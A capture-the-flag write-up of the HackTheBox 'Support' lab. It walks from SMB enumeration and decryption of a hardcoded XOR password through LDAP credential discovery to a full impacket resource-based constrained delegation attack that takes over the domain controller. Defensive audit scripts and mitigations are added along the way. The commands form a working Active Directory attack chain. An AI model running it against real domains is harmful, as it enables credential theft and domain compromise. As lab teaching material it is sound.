Introduction
The HackTheBox "Support" machine is a masterclass in realistic Active Directory exploitation. It demonstrates how a single exposed credential can cascade through misconfigured permissions, ultimately leading to complete domain compromise.
In this writeup, we'll walk through the complete attack chain: from initial reconnaissance to extracting both the user and root flags. Along the way, we'll uncover vulnerabilities in SMB access controls, weak credential storage, and dangerous Active Directory delegation configurations.
1. Reconnaissance: Mapping the Target
Let's start by identifying what's running on the machine with Nmap:
nmap -sC -sV -A <MACHINE-IP>
Key Findings:
- Port 53: DNS (Simple DNS Plus)
- Port 88: Kerberos
- Port 135/445: Windows RPC and SMB
- Port 389/3268: LDAP (Active Directory)
- Port 5985: WinRM (Windows Remote Management)
This is clearly a Windows Active Directory domain controller. The LDAP output reveals the domain name: support.htb
dig @<MACHINE-IP> support.htb any
echo "<MACHINE-IP> support.htb dc.support.htb" | sudo tee -a /etc/hosts
2. SMB Enumeration: Finding the Weak Link
smbclient -L <MACHINE-IP>
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
support-tools   Disk      support staff tools
SYSVOL          Disk      Logon server share
Most shares are protected, but there's a custom share: support-tools — accessible to everyone.
2.1 Downloading from the Support-Tools Share
smbclient //<MACHINE-IP>/support-tools -N
smb: \> ls
Files found:
- 7-ZipPortable_21.07.paf.exe
- npp.8.4.1.portable.x64.zip
- putty.exe
- SysinternalsSuite.zip
- UserInfo.exe.zip ← Suspicious
- windirstat1_1_2_setup.exe
- WiresharkPortable64_3.6.5.paf.exe
smb: \> get UserInfo.exe.zip
unzip UserInfo.exe.zip
3. Initial Foothold: Extracting Hidden Credentials
3.1 Identifying the Binary Type
file UserInfo.exe
# Output: PE32 executable (console) Intel 80386 Mono/.Net assembly
This is a 32-bit .NET application — easily decompiled back to source code.
3.2 Decompiling the Application
ilspycmd UserInfo.exe > output.cs
After analyzing the decompiled code, we discover something critical:
// Hardcoded, Base64-encoded "encrypted" password and the XOR key used to unwrap it
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
private static byte[] key = Encoding.ASCII.GetBytes("armando");

public static string getPassword()
{
    byte[] array = Convert.FromBase64String(enc_password);
    byte[] array2 = array; // same buffer; the loop decrypts in place
    for (int i = 0; i < array.Length; i++)
    {
        // each byte is XORed with the repeating key and then with the constant 0xDF
        array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
    }
    return Encoding.Default.GetString(array2);
}
What we found:
- Hardcoded Base64-encoded password
- XOR encryption key: armando
- Additional XOR constant: 0xDF
3.3 Decrypting the Password
#!/usr/bin/env python3
import base64
import sys


def decrypt_xor(enc_password, key, xor_constant=0xDF):
    """Reverse UserInfo.exe's getPassword(): Base64-decode, then XOR every byte
    with the repeating key and with the constant."""
    if isinstance(key, str):
        key = key.encode()
    data = base64.b64decode(enc_password)
    decoded = bytearray()
    for i in range(len(data)):
        decoded.append((data[i] ^ key[i % len(key)]) ^ xor_constant)
    return decoded.decode()


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"usage: {sys.argv[0]} <base64-ciphertext> <key> [xor-constant]", file=sys.stderr)
        sys.exit(2)
    enc_password = sys.argv[1]
    key = sys.argv[2]
    # int(x, 0) accepts both "223" and "0xDF"
    xor_constant = int(sys.argv[3], 0) if len(sys.argv) > 3 else 0xDF
    try:
        decrypted = decrypt_xor(enc_password, key, xor_constant)
        print(f"[+] Decrypted: {decrypted}")
    except Exception as e:
        print(f"[-] Error: {e}", file=sys.stderr)
        sys.exit(1)
python3 decrypt.py 0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E 'armando'
# [+] Decrypted: nvEfEK16^aM4$e7AclUf8x$tRWxPWO1%lmz
LDAP credentials: ldap : nvEfEK16^aM4$e7AclUf8x$tRWxPWO1%lmz
4. LDAP Enumeration: Finding the Admin Password
ldapsearch -x -H ldap://<MACHINE-IP> \
-D "support\\ldap" \
-w 'nvEfEK16^aM4$e7AclUf8x$tRWxPWO1%lmz' \
-b "dc=support,dc=htb" \
"(ObjectClass=User)" "*"
The info field on the support user contains plaintext credentials: support : Ironside47pleasure40Watchful
This is a critical security failure — passwords should never be stored in AD attributes in plaintext.
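The ldapsearch above finds the password by eye. To show how a defender would catch the same weakness across a whole directory, here is an added audit script that is not part of the original writeup: it scans the free-text attributes of user objects (info, description, comment are real AD attributes) for password keywords or high-entropy tokens. The entries are constructed inline to stand in for ldap3 or ldapsearch results; the support entry mirrors what the writeup found, the other two accounts and their values are made up.

```python
#!/usr/bin/env python3
"""Added example: scan user objects' free-text attributes for stored credentials."""
import math
import re

# Attributes that administrators commonly misuse as note fields
TEXT_ATTRIBUTES = ("info", "description", "comment")
KEYWORD_RE = re.compile(r"\b(pass(word|wd)?|pwd|credential|secret)\b", re.I)


def shannon_entropy(s):
    """Bits per character; a 28-char password with ~20 distinct symbols scores about 4."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def looks_like_secret(token):
    """Heuristic: at least 8 chars, three character classes and >= 3 bits/char of entropy."""
    if len(token) < 8:
        return False
    classes = sum(1 for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]") if re.search(p, token))
    return classes >= 3 and shannon_entropy(token) >= 3.0


def scan_entries(entries):
    """entries: list of dicts shaped like ldap3/ldapsearch results.
    Returns (account, attribute, reason) tuples for every suspicious value."""
    findings = []
    for entry in entries:
        name = entry.get("sAMAccountName", "?")
        for attr in TEXT_ATTRIBUTES:
            value = entry.get(attr) or ""
            if isinstance(value, list):  # multi-valued attributes arrive as lists
                value = " ".join(value)
            if not value:
                continue
            if KEYWORD_RE.search(value):
                findings.append((name, attr, "password keyword"))
            elif any(looks_like_secret(t) for t in value.split()):
                findings.append((name, attr, "high-entropy token"))
    return findings


# Constructed sample: the 'support' entry mirrors the writeup's finding;
# svc_backup and jdoe and their values are made up.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "support", "info": "Ironside47pleasure40Watchful"},
    {"sAMAccountName": "svc_backup", "description": "Temp password: Winter2024!"},
    {"sAMAccountName": "jdoe", "description": "Service account for backup jobs"},
]

if __name__ == "__main__":
    for account, attr, reason in scan_entries(SAMPLE_ENTRIES):
        print(f"[!] {account}.{attr}: {reason}")
```

The two checks are deliberately independent: the keyword regex catches admins who label the secret, the entropy test catches the bare value with no label at all, which is exactly the shape of the support user's info field. Run it against the full output of a `(objectClass=user)` query and review every hit by hand, since long hostnames and license keys also trip the entropy test.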
4.1 Mapping Permissions with BloodHound
bloodhound-python -d support.htb \
-u ldap \
-p 'nvEfEK16^aM4$e7AclUf8x$tRWxPWO1%lmz' \
-dc dc.support.htb \
-ns <MACHINE-IP> \
-c All
BloodHound reveals: the support user is a member of Remote Management Users — WinRM access is possible.
5. User Flag: Getting Shell Access
evil-winrm -i <MACHINE-IP> -u support -p 'Ironside47pleasure40Watchful'
*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
11.........c5
User flag captured!
6. Privilege Escalation: The RBCD Attack
BloodHound shows a dangerous attack path:
support user → (member of) Shared Support Accounts → GenericAll over → Domain Controller computer object
6.1 Understanding RBCD
Resource-based constrained delegation (RBCD) is configured on the target resource itself: the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of a computer object lists which accounts may obtain service tickets to that computer on behalf of other users. Because GenericAll lets us write that attribute on the DC's computer object, we can create a computer account we control, add it to the list, and then request a ticket to the DC as the Administrator.
6.2 Creating a Fake Computer Account
impacket-addcomputer support.htb/support:'Ironside47pleasure40Watchful' \
-dc-ip <MACHINE-IP> \
-computer-name 'FAKEPC$' \
-computer-pass 'Pass123!@#'
6.3 Configuring Delegation
impacket-rbcd support.htb/support:'Ironside47pleasure40Watchful' \
-delegate-from 'FAKEPC$' \
-delegate-to 'DC$' \
-action write \
-dc-ip <MACHINE-IP>
6.4 Impersonating the Administrator
impacket-getST support.htb/'FAKEPC$':'Pass123!@#' \
-spn cifs/dc.support.htb \
-impersonate administrator \
-dc-ip <MACHINE-IP>
export KRB5CCNAME=administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
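The three steps above leave a durable artifact: a security descriptor in the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute whose DACL names the new computer account. The following added example (not part of the original writeup or of impacket) shows how a defender decodes that attribute and flags principals that were never approved. The descriptor bytes are constructed in-code with a builder that mirrors the self-relative layout a write to the attribute produces; the domain SID, the 1105 RID and the computer names are made up, and BUILTIN\Administrators (S-1-5-32-544) is used as owner. In a live audit the raw bytes come from LDAP (the attribute is a binary security descriptor), or from PowerShell's Get-ADComputer -Properties PrincipalsAllowedToDelegateToAccount, which resolves the same ACL for you.

```python
#!/usr/bin/env python3
"""Added example: decode msDS-AllowedToActOnBehalfOfOtherIdentity and report
principals that are allowed to act on behalf of a computer but are not approved."""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_SELF_RELATIVE = 0x8000
SE_DACL_PRESENT = 0x0004
# Constructed sample SIDs: a hypothetical domain SID, not the HTB domain's
FAKE_SID = "S-1-5-21-1000000001-1000000002-1000000003-1105"
ADMINS_SID = "S-1-5-32-544"


def build_sid(sid_str):
    """Encode 'S-R-A-sub1-sub2...' into the binary SID format."""
    parts = sid_str.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def parse_sid(buf, offset):
    """Decode a binary SID starting at offset into 'S-R-A-...' text."""
    revision, sub_count = buf[offset], buf[offset + 1]
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % sub_count, buf, offset + 8)
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs))


def build_rbcd_descriptor(allowed_sids, mask=0x000F01FF):
    """Constructed self-relative security descriptor: owner/group Administrators and a
    DACL holding one ACCESS_ALLOWED_ACE (full control mask) per delegating SID."""
    owner = build_sid(ADMINS_SID)
    aces = b""
    for s in allowed_sids:
        sid = build_sid(s)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid), mask) + sid
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    off_owner = 20                      # header is 20 bytes
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         off_owner, off_group, 0, off_dacl)
    return header + owner + owner + acl


def allowed_to_act(raw):
    """Return [(sid, mask)] for every ACCESS_ALLOWED_ACE in the descriptor's DACL."""
    if not raw:
        return []
    _rev, _sbz, control, _own, _grp, _sacl, off_dacl = struct.unpack_from("<BBHIIII", raw, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _acl_rev, _sbz1, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", raw, off_dacl)
    pos = off_dacl + 8                  # ACL header is 8 bytes
    out = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", raw, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            (mask,) = struct.unpack_from("<I", raw, pos + 4)
            out.append((parse_sid(raw, pos + 8), mask))
        pos += ace_size                 # skip unknown ACE types by size
    return out


def audit_rbcd(computers, approved=frozenset()):
    """Map computer name -> SIDs allowed to act on its behalf that are not approved."""
    findings = {}
    for name, raw in computers.items():
        unexpected = [sid for sid, _ in allowed_to_act(raw) if sid not in approved]
        if unexpected:
            findings[name] = unexpected
    return findings


# Constructed inventory: DC$ carries an RBCD entry for the fake computer, WS01$ has the attribute unset.
SAMPLE_COMPUTERS = {
    "DC$": build_rbcd_descriptor([FAKE_SID]),
    "WS01$": None,
}

if __name__ == "__main__":
    for computer, sids in audit_rbcd(SAMPLE_COMPUTERS).items():
        print(f"[!] {computer}: unexpected principals allowed to delegate: {', '.join(sids)}")
```

Run this across every computer object on a schedule and treat any non-empty result for a domain controller as an incident. For real-time coverage, the same change also shows up in the security log as a computer account creation (event 4741) followed by a directory object modification (event 5136, which requires Directory Service Changes auditing) on the DC's computer object.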
7. Root Flag: Domain Admin Access
impacket-smbexec support.htb/administrator@dc.support.htb -k -no-pass
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
33d............daf
Root flag captured!
8. Attack Chain Summary
| Step | Action |
|---|---|
| Reconnaissance | Nmap identified AD infrastructure |
| SMB Enumeration | Anonymous access revealed UserInfo.exe.zip |
| Binary Decompilation | ILSpy extracted XOR-encrypted LDAP credentials |
| Credential Recovery | Python script decrypted the password |
| LDAP Query | Plaintext password found in support user's info field |
| WinRM Access | Shell via evil-winrm |
| Privilege Escalation | RBCD attack via BloodHound-identified path |
| Domain Admin | S4U2Proxy impersonated Administrator |
9. Key Vulnerabilities & Lessons
1. Anonymous SMB Share — Disable anonymous access, enforce authentication.
2. Hardcoded Credentials — Use secret vaults, never embed credentials in code.
3. Weak XOR Encryption — Use AES with proper key management.
4. Plaintext Credentials in LDAP — Never store sensitive data in directory attributes.
5. Unrestricted WinRM — Restrict to trusted admin networks only.
6. Over-Privileged Groups — Enforce least privilege, audit memberships regularly.
7. GenericAll on DC Object — Review and restrict AD object permissions.
8. Misconfigured RBCD — Audit delegation configurations regularly.
9. No Monitoring — Implement AD logging and real-time alerting.
Conclusion
The Support machine illustrates a common real-world scenario: a single exposed credential escalates into complete domain compromise through a chain of misconfigurations.
Key Takeaways:
- Never trust anonymous SMB shares — they're reconnaissance goldmines
- Always scrutinize binaries for hardcoded secrets
- Monitor and audit AD group memberships and permissions
- Implement the principle of least privilege
- Enable comprehensive logging and alerting for suspicious AD activity
This attack chain is entirely preventable with proper security controls. What's your biggest takeaway from this writeup?